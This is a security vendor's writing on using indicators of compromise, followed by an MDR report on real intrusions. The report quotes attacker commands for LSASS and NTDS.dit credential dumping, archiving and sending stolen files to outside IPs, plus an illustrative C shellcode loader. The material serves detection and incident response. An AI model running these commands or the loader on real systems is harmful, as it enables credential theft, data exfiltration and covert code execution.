By threat hunting we mean activity aimed at revealing threats that have bypassed the SOC’s prevention and detection capabilities. In other words, the Assume Breach paradigm: despite all the prevention and detection capabilities, it is possible that we have missed a successful attack, so we have to analyze our infrastructure as though it were compromised and look for traces of a breach.

This brings us to IOC-based threat hunting. The SOC team analyzes information related to the attack and evaluates whether the threat is applicable to the protected environment. If yes, the hunter tries to find an IOC in past events (such as DNS queries, IP connection attempts, and process executions), or in the infrastructure itself: the presence of a specific file in the system, a specific registry key value, etc. The typical solutions supporting the SOC team in this activity are SIEM, EDR and TIP. For this type of scenario, the most suitable IOCs are those extracted from APT reports or received from your TI peers.

In IOC usage scenarios we have touched on different types of IOCs multiple times. Let’s summarize this information by breaking down IOC types according to their origin:

  • Provider feeds – a subscription to IOCs provided by security vendors in the form of a feed. It usually contains a huge number of IOCs observed in different attacks. The level of confidence varies from vendor to vendor, and the SOC team should consider vendor specialization and geographic profile to make sure the IOCs are relevant. Using feeds for prevention and threat hunting is questionable due to the potentially high rate of false positives.
  • Incident IOCs – IOC generated by the SOC team during analysis of security incidents. Usually, the most trusted type of IOC.
  • Threat intelligence IOCs – a huge family of IOCs generated by the TI team. The quality depends directly on the level of expertise of your TI analysts. The use of TI IOCs for prevention depends heavily on the TI data quality: it can trigger too many false positives and therefore impact business operations.
  • Peer IOCs – IOCs provided by peer organizations, government entities, and professional communities. Can usually be considered as a subset of TI IOCs or incident IOCs, depending on the nature of your peers.

If we summarize the reviewed scenarios, IOC origin, and their applicability, then map this information to NIST Incident Handling stages[5], we can create the following table.

IOC scenario usage in SOC

All these scenarios have different requirements for the quality of IOCs. Usually, in our SOC we don’t have too many issues with incident IOCs, but for the rest we must track quality and manage it in some way. For better quality management, the metrics should be aggregated for every IOC origin, so that we evaluate the IOC source rather than individual IOCs. Some basic metrics, identified by our SOC Consulting team, that can be implemented to measure IOC quality are:

  • Conversion to incident – which proportion of IOCs has triggered a real incident. Applied for detection scenarios
  • FP rate – false positive rate generated by IOC. Works for detection and prevention
  • Uniqueness – applied for IOC source and tells the SOC team how unique the set of provided IOCs is compared to other providers
  • Aging – whether an IOC source provides up-to-date IOCs or not
  • Amount – number of provided IOCs by source
  • Context information – usability and fullness of context provided with IOCs

To collect these metrics, the SOC team should carefully track every IOC origin, usage scenario and the result of use.
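
A minimal sketch (the source names and numbers are invented) of aggregating two of the metrics above, conversion to incident and FP rate, per IOC source rather than per individual indicator:

sources = {
    "vendor_feed":   {"alerts": 1200, "incidents": 6,  "false_positives": 900},
    "incident_iocs": {"alerts": 40,   "incidents": 25, "false_positives": 2},
}
for name, s in sources.items():
    # Both metrics are computed against the total number of alerts the source produced
    print(f"{name}: conversion={s['incidents'] / s['alerts']:.1%}, "
          f"FP rate={s['false_positives'] / s['alerts']:.1%}")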

How does the GERT team use IOCs in its work?

In GERT we specialize in the investigation of incidents and the main sources of information in our work are digital artifacts. By analyzing them, experts discover data that identifies activity directly related to the incident under investigation. Thus, the indicators of compromise allow experts to establish a link between the investigated object and the incident.

Throughout the entire cycle of responding to information security incidents, we use different IOCs at different stages. As a rule, when an incident occurs and the victim gets in touch, we receive indicators of compromise that can serve to confirm the incident, attribute it to an attacker, and make decisions on the initial response steps. For example, if we consider one of the most common types of incident, a ransomware attack, the initial artifacts are files. The IOCs in this case will be the file names or extensions, as well as the hash sums of the files. Such initial indicators make it possible to determine the type of ransomware and point to a group of attackers and their characteristic techniques, tactics and procedures. They also make it possible to define recommendations for an initial response.
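
For illustration, a minimal sketch (the file name is a placeholder) of computing the hash sums that typically serve as such initial file-based IOCs:

import hashlib

def file_hashes(path, chunk_size=1 << 20):
    # Read the file in chunks so large samples do not have to fit in memory
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()

print(file_hashes("suspicious_sample.bin"))   # placeholder path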

The next set of IOCs that we can get are indicators from the data collected by triage. As a rule, these indicators show the attackers’ progress through the network and allow additional systems involved in the incident to be identified. Mostly, these are the names of compromised users, hash sums of malicious files, IP addresses, and URLs. Here it is necessary to note a difficulty that arises: attackers often use legitimate software that is already installed on the targeted systems (LOLBins). In this case, it is harder to distinguish malicious launches of such software from legitimate ones. For example, the mere fact that the PowerShell interpreter is running cannot be assessed without context and payload. In such cases it is necessary to use other indicators, such as timestamps, user names, and event correlation.

Ultimately, all identified IOCs are used to identify compromised network resources and to block the actions of the attackers. In addition, indicators of attack are built on the basis of the indicators of compromise and used for proactive detection of attackers. In the final stage of the response, the indicators that were found are used to verify that there are no more traces of the attackers’ presence in the network.

The result of each completed case with an investigation is a report that collects all the indicators of compromise and indicators of attack based on them. Monitoring teams should add these indicators to their monitoring systems and use them to proactively detect threats.

 
[1] A “hash” is a relatively short, fixed-length, sufficiently unique and non-reversible representation of arbitrary data, which is the result of a “hashing algorithm” (a mathematical function, such as MD5 or SHA-256). Contents of two identical files that are processed by the same algorithm result in the same hash. However, processing two files which only differ slightly will result in two completely different hashes. As a hash is a short representation, it is more convenient to designate (or look for) a given file using its hash than using its whole content.
[2] Telemetry designates the detection statistics and malicious files that are sent from detection products to the Kaspersky Security Network when customers agree to participate.
[3] Vulnerable, weak, and/or attractive systems that are deliberately exposed to the Internet and continuously monitored in a controlled fashion, with the expectation that they will be attacked by threat actors. When that happens, the monitoring practices enable detecting new threats, exploitation methods or tools from attackers.
[4] Hijacking of known malicious command and control servers, in cooperation with Internet hosting providers or by leveraging threat actors’ errors and abandoned infrastructure, in order to neutralize their malicious behaviors, monitor malicious communications, and identify and notify targets.
[5] NIST. Computer Security Incident Handling Guide. Special Publication 800-61 Revision 2

Server-side attacks, C&C in public clouds and other MDR cases we observed https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/ https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/#respond Wed, 02 Nov 2022 08:00:22 +0000 https://kasperskycontenthub.com/securelist/?p=107826

Introduction

This report describes several interesting incidents observed by the Kaspersky Managed Detection and Response (MDR) team. The goal of the report is to inform our customers about techniques used by attackers. We hope that learning about the attacks that took place in the wild helps you to stay up to date on the modern threat landscape and to be better prepared for attacks.

Command and control via the public cloud

The use of public cloud services such as Amazon Web Services, Microsoft Azure or Google Cloud can make an attacker’s server difficult to spot. Kaspersky has reported several incidents where attackers used cloud services for C&C.

Case #1: Cloudflare Workers as redirectors

Case description

The incident started with Kaspersky MDR detecting the use of a comprehensive security assessment toolset, presumably Cobalt Strike, through an antimalware (AM) engine memory scan (MEM:Trojan.Win64.Cobalt.gen). The memory space belonged to the process c:\windows\system32\[legitimate binary name][1].exe.

While investigating, we found that the process had initiated network connections to a potential C&C server:

hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/jquery/secrets/[random sequence]
hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/mails/images/[cut out]?_udpqjnvf=[cut out]

The URL format indicates the use of Cloudflare Workers.

We then found that earlier, the binary had unsuccessfully[2] attempted to execute an lsass.exe memory dump via comsvcs.dll:

CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\[filename].doc full

Several minutes later, a suspicious .bat script was run. This created a suspicious WMI consumer, later classified by MDR as an additional persistence mechanism.

The incident was detected in a timely manner, so the attacker did not have the time to follow through. The attacker’s final goals are thus unknown.

Case detection

The table below lists the signs of suspicious activity that were the starting point for the investigation by the SOC.

T1588.002: Tool
  • MDR telemetry event type used: AM engine detection on beacon
  • Detection details: AM verdict MEM:Trojan.Win64.Cobalt.gen, which can be used for Cobalt Strike or Meterpreter
  • Description: A malicious payload was executed in the victim’s system and started communicating with the C&C server

T1620: Reflective Code Loading
  • MDR telemetry event types used: AM detection in memory; process injection
  • Detection details: AM verdict MEM:Trojan.Win64.Cobalt.gen; detection of code injection from an unknown binary into a system binary
  • Description: The malicious payload migrated to the victim’s memory

T1071.001: Web Protocols
  • MDR telemetry event types used: HTTP connection; process start
  • Detection details: suspicious HTTP connections to the malicious URL blue-rice-1d8e[.]dropboxonline.workers.dev/… from a non-browser process with a system integrity level
  • Description: The attacker’s communications with the C&C server

T1584.006: Web Services
  • MDR telemetry event type used: HTTP connection
  • Detection details: URL reputation, regular expression in URL
  • Description: The attacker’s communications with the C&C server

T1102.001: Dead Drop Resolver
  • MDR telemetry event type used: HTTP connection
  • Detection details: URL reputation, regular expression in URL
  • Description: The attacker’s communications with the C&C server

T1003.001: LSASS Memory
  • MDR telemetry event types used: AM detection on suspicious activity; process start
  • Detection details: AM detection on lsass memory access; regex on a command like rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <PID> lsass.dmp full
  • Description: The attacker’s unsuccessful attempt to dump the lsass.exe memory to a file

T1546.003: Windows Management Instrumentation Event Subscription
  • MDR telemetry event types used: Windows event; WMI activity
  • Detection details: WMI active script event consumer created remotely
  • Description: The attacker gained persistence through active WMI

Payload hidden in long text

Case #1: A scheduled task that loads content from a long text file

Case description

This case started with a suspicious scheduled task. The listing below should give you a general idea of the task and the command it executes.
Scheduled task:

Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A311AA10-BBF3-4CDE-A00B-AAAAB3136D6A}, C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9

Command:

"wscript.exe" /e:vbscript /b "C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"

The scheduled task invokes a VBS script (file path: C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C, MD5 106BC66F5A6E62B604D87FA73D70A708), which extracts a Base64-encoded chunk from the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys, decodes it, and executes the result.
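
To make the mechanism clearer, here is a minimal sketch (written in Python rather than the attacker’s PowerShell; the offset and length are copied from the command above) of the extraction step only: it reads a fixed-size slice of a long text file at a fixed offset and Base64-decodes it.

import base64

def extract_payload(path, offset=1874201, length=422):
    # Read only the 422-byte slice that hides the encoded script
    with open(path, "rb") as f:
        f.seek(offset)
        chunk = f.read(length).decode("utf-8")
    # The decoded text is the script that the scheduled task then executes
    return base64.b64decode(chunk).decode("utf-8")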

The VBS script mimics the content and behavior of the legitimate C:\Windows\System32\SyncAppvPublishingServer.vbs file, but the path and file name are different.

The customer approved our MDR SOC analyst’s request to analyze the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys. A quick analysis revealed a Base64-encoded payload inside long text content (see the picture below).

The decoded payload contained a link to a C&C server:

Further telemetry analysis showed that the infection was probably caused by the following process, likely a malicious activator (MD5 F0829E688209CA94305A256B25FEFAF0):

C:\Users\<… cut out … >\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe

The activator was downloaded with the Tixati BitTorrent client and executed by a member of the local Administrators group.

Fortunately, the telemetry analysis did not reveal any evidence of malicious activity from the discovered C&C server (counter[.]wmail-service[.]com), which would have allowed downloading further stages of infection. In the meantime, a new AM engine signature was released, and the malicious samples were now detected as Trojan-Dropper.Win64.Agent.afp (F0829E688209CA94305A256B25FEFAF0) and Trojan.PowerShell.Starter.o (106BC66F5A6E62B604D87FA73D70A708). The C&C URL was correctly classified as malicious.

Case detection

The table below lists the attack techniques and how they were detected by Kaspersky MDR.

T1547.001: Registry Run Keys / Startup Folder
  • MDR telemetry event types used: autostart entry; AM detection
  • Detection details: regex on autostart entry details; heuristic AM engine verdict HEUR:Trojan.Multi.Agent.gen
  • Description: Malicious persistence

T1059.001: PowerShell
  • MDR telemetry event type used: autostart entry
  • Detection details: regex on autostart entry details
  • Description: Execution of PowerShell code via “ScriptBlock” instead of “Invoke-Expression”

T1216.001: System Script Proxy Execution
  • MDR telemetry event type used: process start
  • Detection details: regex on command line
  • Description: Malicious payload execution via C:\Windows\System32\SyncAppvPublishingServer.vbs

T1204.002: Malicious File
  • MDR telemetry event types used: process start; local file operation
  • Detection details: execution sequence svchost.exe → explorer.exe → patch.exe from the directory C:\Users\<removed>\Downloads\ExcelAnalyzer 3.4.3\crack\; creation of c:\users\<removed>\downloads\excelanalyzer 3.4.3\setup_excelanalyzer.exe in the order chrome.exe → tixati.exe; creation of 02f4f239-0922-49fe-a338-c7460cb37d95.sys in the order svchost.exe → patch.exe with the process command line “C:\Users\<removed>\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe”; the contents of 02f4f239-0922-49fe-a338-c7460cb37d95.sys do not match the extension (text instead of binary)
  • Description: The user executed a file downloaded by the Tixati BitTorrent client; as a result, the file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was created

T1027: Obfuscated Files or Information
T1140: Deobfuscate/Decode Files or Information
  • MDR telemetry event type used: the suspicious file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was requested from the customer via an MDR response
  • Detection details: 02f4f239-0922-49fe-a338-c7460cb37d95.sys contained text; starting on line 4890, it contained a Base64-encoded payload
  • Description: The attacker hid the payload

T1071.001: Web Protocols
  • MDR telemetry event types used: HTTP connection; network connection
  • Detection details: the SOC checked for successful connections to the discovered C&C server
  • Description: A search for the attacker’s possible attempts to execute further stages of the attack

Server-side attacks on the perimeter

Case #1: A ProxyShell vulnerability in Microsoft Exchange

Case description

During manual threat hunting, the Kaspersky SOC team detected suspicious activity on a Microsoft Exchange server: the process MSExchangeMailboxReplication.exe attempted to create several suspicious files:

\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rqfja.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\yjiba.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\jiwkl.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\qwezb.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\qspwi.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\premium\upxnl.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\qikyp.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\resources\jvdyt.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\mgsjz.aspx

The ASPX file format, which the service should not create, and the random file names led our SOC analyst to believe that those files were web shells.

Telemetry analysis of the suspicious file creation attempts showed that Kaspersky Endpoint Security (KES) had identified the process behavior as PDM:Exploit.Win32.Generic and blocked some of the activities.

Similar behavior was detected the next day, this time an attempt at creating one file:

\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rmvbe.aspx

KES had blocked the exploitation attempts. Nonetheless, the attempts themselves indicated that the Microsoft Exchange server was vulnerable and in need of patching as soon as possible.

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

T1190: Exploit Public-Facing Application
  • MDR telemetry event type used: AM detection
  • Detection details: heuristic AM engine verdict PDM:Exploit.Win32.Generic
  • Description: Exploitation attempt

T1505.003: Web Shell
  • MDR telemetry event type used: local file operation
  • Detection details: attempts at creating ASPX files using the MSExchangeMailboxReplication.exe process
  • Description: Web shell file creation

Case #2: MS SQL Server exploitation

Case description

The incident was detected due to suspicious activity exhibited by sqlservr.exe, a legitimate Microsoft SQL Server process. At the time of detection, the account active on the host was S-1-5-21-<…>-<…>-<…>-181797 (Domain / username).

The SQL Server process attempted to create a suspicious file:

c:\windows\serviceprofiles\mssql$sqlexpress\appdata\local\temp\tmpd279.tmp

We observed that a suspicious assembly, db_0x2D09A3D6\65536_fscbd (MD5 383D20DE8F94D12A6DED1E03F53C1E16), with the original file name evilclr.dll, was loaded into the SQL Server process (c:\program files\microsoft sql server\mssql15.sqlexpress\mssql\binn\sqlservr.exe).

The file was detected by the AM engine as HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b.

The SQL Server host had previously been seen to be accessible from the Internet and scanned from the TOR network.

After the suspicious assembly load, the AM engine detected execution of malicious SQL jobs. The SQL jobs contained obfuscated PowerShell commands. For example:

The created SQL jobs attempted to connect to URLs like those shown below:

hxxp://101.39.<…cut…>.58:16765/2E<…cut…>2F.Png
hxxp://103.213.<…cut…>.55:15909/2E<…cut…>2F.Png
hxxp://117.122.<…cut…>.10:19365/2E<…cut…>2F.Png
hxxp://211.110.<…cut…>.208:19724/2E<…cut…>2F.Png
hxxp://216.189.<…cut…>.94:19063/2E<.cut...>2F.Png
hxxp://217.69.<…cut…>.139:13171/2E<…cut…>2F.Png
hxxp://222.138.<…cut…>.26:17566/2E<…cut…>2F.Png
hxxp://222.186.<…cut…>.157:14922/2E<…cut…>2F.Png
hxxp://45.76.<…cut…>.180:17128/2E<…cut…>2F.Png
hxxp://59.97.<…cut…>.243:17801/2E<…cut…>2F.Png
hxxp://61.174.<…cut…>.163:15457/2E<…cut…>2F.Png
hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png
hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png
hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png

Some of the IP addresses were already on the deny list, while others were added in response to this incident.

We did not observe any other host within the monitoring scope attempting to connect to these IP addresses, which confirmed that the attack had been detected at an early stage.

The next day, the same activity, with the same verdicts (HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b) was detected on another SQL Server host, which was also accessible from the Internet.

Since the attack was detected in time and its further progress was blocked by the AM engine, the attacker was not able to proceed, and the customer corrected the network configuration errors to block access to the server from the Internet.

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

T1090.003: Multi-hop Proxy
T1595.002: Vulnerability Scanning
  • MDR telemetry event types used: network connection; AM detection
  • Detection details: reputation analysis showed the use of the TOR network for scanning; the scanning activity was detected through network connection analysis and by the AM engine
  • Description: The attacker scanned the SQL Server host

T1190: Exploit Public-Facing Application
  • MDR telemetry event types used: process start; autostart entry
  • Detection details: the server application sqlservr.exe launched powershell.exe in the following order: services.exe → sqlservr.exe → powershell.exe; execution of the object previously detected as an autostart entry with a bad reputation: sql:\SQLEXPRESS\db_0x2D09A3D6\65537_fscbd (original file name: evilclr.dll)
  • Description: The attacker successfully exploited the SQL server

T1059.001: PowerShell
  • MDR telemetry event types used: autostart entry; process start
  • Detection details: command line analysis showed the use of PowerShell
  • Description: Malicious persistence via an SQL Server job

T1027: Obfuscated Files or Information
  • MDR telemetry event types used: autostart entry; process start
  • Detection details: regex- and ML-based analysis of the SQL Server Agent job command line; regex- and ML-based analysis of the command line in the services.exe → sqlservr.exe → powershell.exe execution sequence
  • Description: The attacker attempted to evade detection

T1505.001: SQL Stored Procedures
  • MDR telemetry event types used: autostart entry; AM detection; AM detection on suspicious activity
  • Detection details: SQL Server Agent job analysis; heuristic detects on the PowerShell SQL Server Agent job, verdict HEUR:Trojan.Multi.Powecod.a
  • Description: Malicious persistence via an SQL Server job

T1071.001: Web Protocols
  • MDR telemetry event types used: HTTP connection; AM detection
  • Detection details: the URL reputation as well as an AM generic heuristic verdict similar to HEUR:Trojan.Multi.GenBadur.genw pointed to the use of a malicious C&C server
  • Description: The attacker’s C&C server

What does exfiltration in a real-life APT look like?

Case #1: Collecting and stealing documents

Case description

Kaspersky MDR detected suspicious activity on one particular host in the customer’s infrastructure, as the following process was started remotely via psexec:

“cmd.exe” /c “c:\perflogs\1.bat”, which started:

findstr  "10.<…cut…>.
wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username1>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]"  /c:1 
wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username2>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1

After that, the following inventory commands were executed by the binary C:\ProgramData\USOPrivate\UpdateStore\windnphd.exe:

C:\Windows\system32\cmd.exe /C ping 10.<…cut…> -n 2 
query  user 
C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password>   
C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>    
C:\Windows\system32\cmd.exe /C net group "domain admins" /domain    
C:\Windows\system32\cmd.exe /C ping <hostname1>    
C:\Windows\system32\cmd.exe /C vssadmin list shadows    
C:\Windows\system32\cmd.exe /C ipconfig /all    
C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$

Suspicious commands triggering actions in the Active Directory Database were executed:

C:\Windows\system32\cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit  
C:\Windows\system32\cmd.exe /C dir c:\windows\system32\ntds.dit 
C:\Windows\system32\cmd.exe /C dir c:\  
C:\Windows\system32\cmd.exe /C dir c:\windows\ntds\ntds.dit

After these commands were executed, the windnphd.exe process started an HTTP connection:

hxxp[:]//31.192.234[.]60:53/useintget

Then a suspicious file, c:\users\public\nd.exe (MD5 AAE3A094D1B019097C7DFACEA714AB1B), created by the windnphd.exe process, executed the following commands:

nd.exe  c:\windows\system32\config\system c:\users\public\sys.txt
nd.exe  c:\windows\ntds\ntds.dit c:\users\public\nt.txt
C:\Windows\system32\cmd.exe /C move *.txt c:\users\public\tmp
C:\Windows\system32\cmd.exe /C rar.exe a -k -r -s -m1  c:\users\public\n.rar   c:\users\public\tmp\
rar.exe  a -k -r -s -m1  c:\users\public\n.rar   c:\users\public\tmp\

Later, the SOC observed that a suspicious scheduled task had been created on the same host:

schtasks  /create  /sc minute /mo 30 /ru system  /tn \tmp /tr "c:\users\public\s.exe c:\users\public\0816-s.rar 38[.]54[.]14[.]183 53 down"  /f

The task executed a suspicious file: c:\users\public\s.exe (MD5 6C62BEED54DE668234316FC05A5B2320)

This executable used the archive c:\users\public\0816-s.rar and the suspicious IP address 38[.]54[.]14[.]183, located in Vietnam, as parameters.

The 0816-s.rar archive was created via remote execution of the following command through psexec:

rar a -k -r -s -ta[Pass_in_clear_text] -m1  c:\users\public\0816-s.rar   "\\10.<…cut…>\c$\users\<username4>\Documents\<DocumentFolder1>"

After that, we detected a suspicious network connection to the IP address 38[.]54[.]14[.]183 from the s.exe executable. The activity looked like an attempt to transfer the data collected during the attack to the attacker’s C&C server.

Similar suspicious behavior was detected on another host, <hostname>.

First, a suspicious file was created over the SMB protocol: c:\users\public\winpdasd.exe (MD5: B83C9905F57045110C75A950A4EE56E4).

Next, a task was created remotely via psexec.exe:

schtasks  /create  /sc minute /mo 30 /ru system  /tn \tmp /tr "c:\users\public\winpdasd.exe"  /f

During task execution, an external network communication was detected, and certain discovery commands were executed:

hxxp://31[.]192.234.60:53/useintget
ping  10.<…cut…> -n 1
query  user
net  use

This was followed by a connection to a network share on the host 10.<…cut…> as username3:

C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>

More reconnaissance command executions were detected:

C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$\users\<username4>\AppData\Roaming\Adobe\Linguistics
C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> |findstr rundll32.exe
tasklist  /S 10.<…cut…> -U <domain>\<username3> -P <password>
C:\Windows\system32\cmd.exe /C taskkill /S 10.<…cut…> -U <domain>\<username3> -P <password> /pid <PID> /f
C:\Windows\system32\cmd.exe /C schtasks /run /s 10.<…cut…> /u <domain>\<username3> /p "<password>" /tn \Microsoft\Windows\Tcpip\dcrpytod

Then winpdasd.exe created the file windpchsvc.exe (MD5: AE03B4C183EAA7A4289D8E3069582930) and set it up as a task:

C:\Windows\system32\cmd.exe /C schtasks /create  /sc minute /mo 30 /ru system  /tn \Microsoft\Windows\Network\windpch /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\windpchsvc.exe"  /f

After that, C&C communications were detected:

hxxp://139.162.35[.]70:53/micsoftgp

This incident, a fragment of a long-running APT campaign, demonstrates a data collection scenario. It shows that the attacker’s final goal was to spy on and monitor the victim’s IT infrastructure. Another feature of targeted attacks that can be clearly seen from this incident is the use of custom tools. An analysis of these is given later in this report as an example.

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

T1569.002: Service Execution
  • MDR telemetry event types used: process start; Windows event; AM detection on suspicious activity
  • Detection details: command line analysis; Windows events on service installation and service start; AM behavior analysis
  • Description: The attacker performed reconnaissance and searched local logs, persisted in the victim’s system through service creation, and executed windnphd.exe through psexec

T1592: Gather Victim Host Information
T1590: Gather Victim Network Information
  • MDR telemetry event type used: process start
  • Detection details: command line analysis
  • Description: The attacker performed internal reconnaissance

T1021.002: SMB/Windows Admin Shares
  • MDR telemetry event type used: share access
  • Detection details: inbound and outbound share access
  • Description: The attacker tried to access \\10.<…cut…>.65\ipc$ and \\10.<…cut…>.52\c$

T1003.003: NTDS
  • MDR telemetry event type used: process start
  • Detection details: command line analysis
  • Description: The attacker accessed NTDS.dit with ntdsutil

T1071.001: Web Protocols
  • MDR telemetry event types used: HTTP connection; network connection; AM detection on suspicious activity
  • Detection details: the SOC checked if the data transfer was successful; the connection was initiated by the suspicious process windnphd.exe
  • Description: The attacker communicated with the C&C server at hxxp[:]//31.192.234[.]60:53/useintget

T1571: Non-Standard Port
  • MDR telemetry event types used: HTTP connection; network connection
  • Detection details: the SOC detected the use of the HTTP protocol on the non-standard 53/TCP port
  • Description: The attacker used the C&C server hxxp[:]//31.192.234[.]60:53/useintget

T1587.001: Malware
  • MDR telemetry event types used: local file operation; process start; AM detection on suspicious activity
  • Detection details: use of various suspicious binaries prepared by the attacker specifically for this attack
  • Description: The attacker used custom tools: s.exe, winpdasd.exe, windpchsvc.exe (see detailed report below)

T1497: Virtualization/Sandbox Evasion
  • MDR telemetry event type used: malware analysis
  • Detection details: detected the HookSleep function (see below)
  • Description: The attacker attempted to detect sandboxing; the emulation detection was found in the custom tools winpdasd.exe and windpchsvc.exe

T1036.005: Match Legitimate Name or Location
  • MDR telemetry event types used: local file operation; malware analysis
  • Detection details: operations with the file c:\users\Default\ntusers.dat
  • Description: The attacker attempted to hide a shellcode inside a file with a name similar to the legitimate ntuser.dat

T1140: Deobfuscate/Decode Files or Information
  • MDR telemetry event types used: local file operation; malware analysis
  • Detection details: the file ntusers.dat contained an encoded shellcode, which was later executed by winpdasd.exe and windpchsvc.exe
  • Description: The attacker executed arbitrary code

T1560.001: Archive via Utility
  • MDR telemetry event type used: process start
  • Detection details: use of the RAR archiver for data collection
  • Description: The attacker archived the stolen credentials and documents

T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol
  • MDR telemetry event types used: process start; network connection
  • Detection details: command line analysis; analysis of the process that initiated the connection
  • Description: The attacker used a custom tool to exfiltrate data

An analysis of the custom tools used by the attacker

windpchsvc.exe and winpdasd.exe

Both malware samples are designed to extract a payload from a file, decode it, and directly execute it via a function call. The payload is encoded shellcode.

Both samples read their payload from a file whose name mimics a legitimate system file, a naming trick intended to deceive investigators and users:

Payload file for windpchsvc.exe

The malware, windpchsvc.exe, reads from the file c:\users\Default\ntusers.dat. A legitimate file, named ntuser.dat, exists in this location. Note that the bona fide registry file does not contain an ‘s’.

A similar file name was used for the winpdasd.exe malware:

Payload file for winpdasd.exe

The malware reads from this file and decodes the bytes for direct execution via a function call, as seen below (call [ebp+payload_alloc] and call esi):

windpchsvc.exe: decode, allocate memory, copy to mem, execute

winpdasd.exe: decode, allocate memory, copy to mem, execute via function call

The payload files (ntusers.dat) contain the main logic, while the samples we analyzed are just the loaders.
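
To make the loader behavior easier to follow, here is a minimal C sketch of the same read/decode/execute pattern. The file path matches the one observed for windpchsvc.exe; the variable names and the single-byte XOR decoding are our own simplifications for illustration, not the routine actually used by the samples.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    /* Payload file masquerading as the legitimate ntuser.dat */
    const char *path = "C:\\Users\\Default\\ntusers.dat";

    FILE *f = fopen(path, "rb");
    if (!f) return 1;
    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    fseek(f, 0, SEEK_SET);

    unsigned char *buf = (unsigned char *)malloc(size);
    if (!buf || fread(buf, 1, size, f) != (size_t)size) return 1;
    fclose(f);

    /* Decode the payload. The real encoding is specific to the samples;
       a single-byte XOR is used here purely as a placeholder. */
    for (long i = 0; i < size; i++)
        buf[i] ^= 0x5A;

    /* Allocate executable memory, copy the shellcode and call it directly,
       mirroring the "call [ebp+payload_alloc]" / "call esi" instructions
       seen in the decompiled loaders. */
    void *mem = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    if (!mem) return 1;
    memcpy(mem, buf, size);
    ((void (*)(void))mem)();

    return 0;
}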

Some of the images show a function that we labeled “HookSleep”, which might be used for sandbox evasion in other forms of this malware. The function has no direct effect on the execution of the payload.

The decompiled function can be seen below:

The "HookSleep" function found in both files, decompiled

The “HookSleep” function found in both files, decompiled

When debugged, the hook worked as expected: calls to the Win32 Sleep function are redirected to the function defined in the malware:

